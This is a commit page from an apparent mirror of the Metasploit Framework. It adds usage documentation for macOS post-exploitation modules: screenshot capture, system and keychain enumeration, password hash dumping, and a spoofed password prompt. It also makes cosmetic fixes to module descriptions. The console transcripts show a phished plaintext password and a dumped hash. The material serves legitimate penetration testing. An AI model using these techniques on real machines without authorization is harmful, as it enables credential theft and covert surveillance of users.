infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

osx docs and cleanup

master
h00die 2019-04-15 21:01:05 -04:00
parent f41a90a582
commit 621c7182bf
9 changed files with 387 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

85
documentation/modules/post/osx/admin/say.md Normal file
View File

@ -0,0 +1,85 @@
## Vulnerable Application
This module will speak whatever is in the 'TEXT' option on the victim machine.
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/admin/say```
4. Do: ```run```
5. You should hear 'metasploit' through the speakers
## Options
**TEXT**
The text that should be read. Default is `meta-sploit!`.
**VOICE**
The voice to use. Default is `alex`.
This can be obtained on the system by specifying `-v ?` (example from 10.14.4):
```
say -v ?
Alex en_US # Most people recognize me by my voice.
Alice it_IT # Salve, mi chiamo Alice e sono una voce italiana.
Alva sv_SE # Hej, jag heter Alva. Jag är en svensk röst.
Amelie fr_CA # Bonjour, je mappelle Amelie. Je suis une voix canadienne.
Anna de_DE # Hallo, ich heiße Anna und ich bin eine deutsche Stimme.
Carmit he_IL # שלום. קוראים לי כרמית, ואני קול בשפה העברית.
Damayanti id_ID # Halo, nama saya Damayanti. Saya berbahasa Indonesia.
Daniel en_GB # Hello, my name is Daniel. I am a British-English voice.
Diego es_AR # Hola, me llamo Diego y soy una voz española.
Ellen nl_BE # Hallo, mijn naam is Ellen. Ik ben een Belgische stem.
Fiona en-scotland # Hello, my name is Fiona. I am a Scottish-English voice.
Fred en_US # I sure like being inside this fancy computer
Ioana ro_RO # Bună, mă cheamă Ioana . Sunt o voce românească.
Joana pt_PT # Olá, chamo-me Joana e dou voz ao português falado em Portugal.
Jorge es_ES # Hola, me llamo Jorge y soy una voz española.
Juan es_MX # Hola, me llamo Juan y soy una voz mexicana.
Kanya th_TH # สวัสดีค่ะ ดิฉันชื่อKanya
Karen en_AU # Hello, my name is Karen. I am an Australian-English voice.
Kyoko ja_JP # こんにちは、私の名前はKyokoです。日本語の音声をお届けします。
Laura sk_SK # Ahoj. Volám sa Laura . Som hlas v slovenskom jazyku.
Lekha hi_IN # नमस्कार, मेरा नाम लेखा है. मैं हिन्दी में बोलने वाली आवाज़ हूँ.
Luca it_IT # Salve, mi chiamo Luca e sono una voce italiana.
Luciana pt_BR # Olá, o meu nome é Luciana e a minha voz corresponde ao português que é falado no Brasil
Maged ar_SA # مرحبًا اسمي Maged. أنا عربي من السعودية.
Mariska hu_HU # Üdvözlöm! Mariska vagyok. Én vagyok a magyar hang.
Mei-Jia zh_TW # 您好,我叫美佳。我說國語。
Melina el_GR # Γεια σας, ονομάζομαι Melina. Είμαι μια ελληνική φωνή.
Milena ru_RU # Здравствуйте, меня зовут Milena. Я русский голос системы.
Moira en_IE # Hello, my name is Moira. I am an Irish-English voice.
Monica es_ES # Hola, me llamo Monica y soy una voz española.
Nora nb_NO # Hei, jeg heter Nora. Jeg er en norsk stemme.
Paulina es_MX # Hola, me llamo Paulina y soy una voz mexicana.
Samantha en_US # Hello, my name is Samantha. I am an American-English voice.
Sara da_DK # Hej, jeg hedder Sara. Jeg er en dansk stemme.
Satu fi_FI # Hei, minun nimeni on Satu. Olen suomalainen ääni.
Sin-ji zh_HK # 您好,我叫 Sin-ji。我講廣東話。
Tessa en_ZA # Hello, my name is Tessa. I am a South African-English voice.
Thomas fr_FR # Bonjour, je mappelle Thomas. Je suis une voix française.
Ting-Ting zh_CN # 您好我叫Ting-Ting。我讲中文普通话。
Veena en_IN # Hello, my name is Veena. I am an Indian-English voice.
Victoria en_US # Isn't it nice to have a computer that will talk to you?
Xander nl_NL # Hallo, mijn naam is Xander. Ik ben een Nederlandse stem.
Yelda tr_TR # Merhaba, benim adım Yelda. Ben Türkçe bir sesim.
Yuna ko_KR # 안녕하세요. 제 이름은 Yuna입니다. 저는 한국어 음성입니다.
Yuri ru_RU # Здравствуйте, меня зовут Yuri. Я русский голос системы.
Zosia pl_PL # Witaj. Mam na imię Zosia, jestem głosem kobiecym dla języka polskiego.
Zuzana cs_CZ # Dobrý den, jmenuji se Zuzana. Jsem český hlas.
```
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say
msf5 post(osx/admin/say) > set session 1
session => 1
msf5 post(osx/admin/say) > run
[*] Post module execution completed
```

53
documentation/modules/post/osx/capture/screen.md Normal file
View File

@ -0,0 +1,53 @@
## Vulnerable Application
This module takes screenshots of target desktop and automatically downloads them.
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/capture/screen```
5. Do: ```set session #```
5. Do: ```run```
6. You should have a screenshot saved to loot
## Options
**COUNT**
The number of screenshots to collect. Default is `1`.
**DELAY**
Interval between screenshots in seconds. 0 for no delay. Default is `10`.
**EXE_PATH**
Path to remote screencapture executable. Default is `/usr/sbin/screencapture`
**FILETYPE**
File format to use when saving a snapshot (Accepted: png, gif). Default is `png`.
**TMP_PATH**
Path to remote temp directory. Default is `/tmp/<random>`
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen
msf5 post(osx/capture/screen) > set session 1
session => 1
msf5 post(osx/capture/screen) > run
[*] Capturing 1 screenshots with a delay of 10 seconds
[*] Screen Capturing Complete
[*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot
[*] Post module execution completed
msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
222.222.2.222 screen_capture.screenshot screenshot.0.png image/png Screenshot /loot/20190414205923_default_222.222.2.222_screen_capture.s_194117.png
```

120
documentation/modules/post/osx/gather/enum_osx.md Normal file
View File

@ -0,0 +1,120 @@
## Vulnerable Application
This module gathers basic system information from Mac OS X Tiger (10.4), through Mojave (10.14).
The following information is enumerated:
1. OS
2. Network
3. Bluetooth
4. Ethernet
5. Printers
6. USB
7. Airport
8. Firewall
9. Known Networks
10. Applications
11. Development Tools
12. Frameworks
13. Logs
14. Preference Panes
15. StartUp
16. TCP/UDP Connections
17. Environment Variables
18. Last Boottime
19. Current Activity
20. Process List
21. Users & Groups
22. User history files (`.bash_history`)
23. User keychains (downloaded as well)
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/gather/enum_osx```
4. Do: ```set session #```
5. Do: ```run```
6. You should have lots of files saved to the logs folder
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 > use post/osx/gather/enum_osx
msf5 post(osx/gather/enum_osx) > show options
Module options (post/osx/gather/enum_osx):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(osx/gather/enum_osx) > set session 1
session => 1
msf5 post(osx/gather/enum_osx) > run
[*] Running module against MacBook-Pro.nogroup
[*] Saving all data to /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
[*] Enumerating OS
[*] Enumerating Network
[*] Enumerating Bluetooth
[*] Enumerating Ethernet
[*] Enumerating Printers
[*] Enumerating USB
[*] Enumerating Airport
[*] Enumerating Firewall
[*] Enumerating Known Networks
[*] Enumerating Applications
[*] Enumerating Development Tools
[*] Enumerating Frameworks
[*] Enumerating Logs
[*] Enumerating Preference Panes
[*] Enumerating StartUp
[*] Enumerating TCP Connections
[*] Enumerating UDP Connections
[*] Enumerating Environment Variables
[*] Enumerating Last Boottime
[*] Enumerating Current Activity
[*] Enumerating Process List
[*] Enumerating Users
[*] Enumerating Groups
[*] Extracting history files
[*] History file .bash_history found for h00die
[*] Downloading .bash_history
[*] Enumerating and Downloading keychains for h00die
[*] Post module execution completed
msf5 post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
[*] exec: ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
total 1.4M
drwxr-xr-x 2 root root 4.0K Apr 15 07:58 .
drwxr-xr-x 3 root root 4.0K Apr 15 07:57 ..
-rw-r--r-- 1 root root 4.2K Apr 15 07:57 Airport.txt
-rw-r--r-- 1 root root 87K Apr 15 07:57 Applications.txt
-rw-r--r-- 1 root root 3.5K Apr 15 07:57 Bluetooth.txt
-rw-r--r-- 1 root root 64 Apr 15 07:58 Current Activity.txt
-rw-r--r-- 1 root root 0 Apr 15 07:57 Development Tools.txt
-rw-r--r-- 1 root root 308 Apr 15 07:58 Environment Variables.txt
-rw-r--r-- 1 root root 0 Apr 15 07:57 Ethernet.txt
-rw-r--r-- 1 root root 129 Apr 15 07:57 Firewall.txt
-rw-r--r-- 1 root root 316K Apr 15 07:58 Frameworks.txt
-rw-r--r-- 1 root root 62 Apr 15 07:58 Groups.txt
-rw-r--r-- 1 root root 414 Apr 15 07:58 h00die_.bash_history.txt
-rw-r--r-- 1 root root 63 Apr 15 07:58 h00die_bash__line_342__usr_bin_security__No_such_file_or_directory
-rw-r--r-- 1 root root 1.3K Apr 15 07:57 Known Networks.txt
-rw-r--r-- 1 root root 32 Apr 15 07:58 Last Boottime.txt
-rw-r--r-- 1 root root 841K Apr 15 07:58 Logs.txt
-rw-r--r-- 1 root root 2.1K Apr 15 07:57 Network.txt
-rw-r--r-- 1 root root 364 Apr 15 07:57 OS.txt
-rw-r--r-- 1 root root 8.8K Apr 15 07:58 Preference Panes.txt
-rw-r--r-- 1 root root 204 Apr 15 07:57 Printers.txt
-rw-r--r-- 1 root root 34K Apr 15 07:58 Process List.txt
-rw-r--r-- 1 root root 0 Apr 15 07:58 StartUp.txt
-rw-r--r-- 1 root root 739 Apr 15 07:58 TCP Connections.txt
-rw-r--r-- 1 root root 4.1K Apr 15 07:58 UDP Connections.txt
-rw-r--r-- 1 root root 1.7K Apr 15 07:57 USB.txt
-rw-r--r-- 1 root root 62 Apr 15 07:58 Users.txt
```

45
documentation/modules/post/osx/gather/hashdump.md Normal file
View File

@ -0,0 +1,45 @@
## Vulnerable Application
This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.14.
## Verification Steps
1. Start msfconsole
2. Get a root privileged shell
3. Do: ```use post/osx/gather/hashdump```
4. Do: ```set session #```
5. Do: ```run```
6. You should see hashes dumped and stored to creds (if db is connected)
## Options
**MATCHUSER**
A regex to run against usernames. Only matched usernames will have their hashes dumped.
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 post(osx/gather/hashdump) > run
[-] Post aborted due to failure: bad-config: Insufficient Privileges: must be running as root to dump the hashes
[*] Post module execution completed
```
### Root level shell on OSX 10.14.4
```
msf5 post(osx/gather/hashdump) > run
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user h00die...
[+] SHA-512 PBKDF2:h00die:$ml$67012$52a3da29923ab1680ae7c28b40a3ba7c2386c679af0392011f706c4ec2a22475$5c935f59a173d25bd4ed5cf59464930153198ea28b70d1e4bb5fe5e39828bec8347419dc53f0f0d93f08399f30b56adcd0f9a6f6e834ba33cba58d6b35fd1021bd81e63edf2a5b2265d8c4b7908d9bcfe127cbcd3c2092d2ab58f1b7a16dc3e11e0d5a7b027c254f3f91fdeb5acc92bcf5a3cc033319f5209f635c0494854a2e
[*] Credential saved in database.
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Post module execution completed
```

79
documentation/modules/post/osx/gather/password_prompt_spoof.md Normal file
View File

@ -0,0 +1,79 @@
## Vulnerable Application
Presents a password prompt dialog to a logged-in OSX user. Depending on the version of OSX, additional steps may be necessary to
allow permission for the prompt to be displayed. See Scenarios for additional details.
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine.
3. Do: ```use post/osx/gather/password_prompt_spoof```
4. Do: ```set session #```
5. Do: ```run```
6. The user will be prompted to enter their password, or complete additional steps.
## Options
**BUNDLEPATH**
Path to bundle containing icon. Default is `/System/Library/CoreServices/CoreTypes.bundle`.
**ICONFILE**
Icon filename relative to bundle. Default is `UserUnknownIcon.icns`
**TEXTCREDS**
Text displayed when asking for a password. Default is `Type your password to allow System Preferences to make changes`.
**TIMEOUT**
Timeout for user to enter credentails. Default is `60`. Newer versions of OSX may require additional time due to user interaction.
## Scenarios
### User level shell on OSX 10.14.4
If the user does not complete the prompt in time, or does not enable permissions to receive the prompt:
```
msf5 post(osx/gather/password_prompt_spoof) > run
[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Timeout period expired before credentials were entered!
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.SGFvISFemjti
[*] Post module execution completed
```
If the user DOES complete the prompt in time:
```
msf5 post(osx/gather/password_prompt_spoof) > run
[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Password entered! What a nice compliant user...
[+] password file contents: 20190415_122536:h00die:alfalfasprouts!
[+] Password data stored as loot in: /loot/20190415122537_default_192.168.2.225_password_355107.txt
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.jJATztdro
[*] Post module execution completed
```
#### User Experience
The following screen shots are from OSX 10.14.4 from a `ssh_login` shell as the user. Executable may change depending on the shell type and user permissions.
The user is first prompts for additional permissions (System Events):
<img width="423" alt="Screen Shot 2019-04-15 at 12 19 38 PM" src="https://user-images.githubusercontent.com/752491/56173728-ead79c80-5fbc-11e9-8a8f-3b3265220c95.png">
Next, the user is prompted to allow Accessibility Access (Events):
<img width="463" alt="Screen Shot 2019-04-15 at 12 20 08 PM" src="https://user-images.githubusercontent.com/752491/56173737-f4f99b00-5fbc-11e9-9dcc-efbfe0cd08eb.png">
Clicking Open System Preferences shows the executable asking for the permissions. The screenshot was taken after clicking the lock in the bottom left corner,
and checking `sshd-keygen-wrapper`:
<img width="670" alt="Screen Shot 2019-04-15 at 12 24 27 PM" src="https://user-images.githubusercontent.com/752491/56173742-fa56e580-5fbc-11e9-8d28-5669e9e9448f.png">
Finally, if done within the `TIMEOUT` (or with all required permissions):
<img width="424" alt="Screen Shot 2019-04-15 at 12 25 25 PM" src="https://user-images.githubusercontent.com/752491/56173748-fe830300-5fbc-11e9-9564-0e7137b051a8.png">

2
modules/post/osx/capture/keylog_recorder.rb
View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
[ true, 'The time between transferring log chunks.', 10 ]
),
OptPort.new('LOGPORT',
[ false, 'Local port opened for momentarily for log transfer', 22899 ]
[ false, 'Local port opened momentarily for log transfer', 22899 ]
)
]
)

4
modules/post/osx/gather/enum_osx.rb
View File

@ -14,8 +14,8 @@ class MetasploitModule < Msf::Post
super( update_info( info,
'Name' => 'OS X Gather Mac OS X System Information Enumeration',
'Description' => %q{
This module gathers basic system information from Mac OS X Tiger, Leopard,
Snow Leopard and Lion systems.
This module gathers basic system information from Mac OS X Tiger (10.4), through
Mojave (10.14).
},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],

2
modules/post/osx/gather/hashdump.rb
View File

@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post
'Name' => 'OS X Gather Mac OS X Password Hash Collector',
'Description' => %q{
This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports
versions 10.3 to 10.9.
versions 10.3 to 10.14.
},
'License' => MSF_LICENSE,
'Author' => [

2
modules/post/osx/gather/password_prompt_spoof.rb
View File

@ -110,7 +110,7 @@ class MetasploitModule < Msf::Post
print_status("Timeout period expired before credentials were entered!")
end
print_status("Cleaning up files in #{host}:#{dir}")
print_status("Cleaning up files in #{host}: #{dir}")
cmd_exec("/usr/bin/srm -rf #{dir}")
end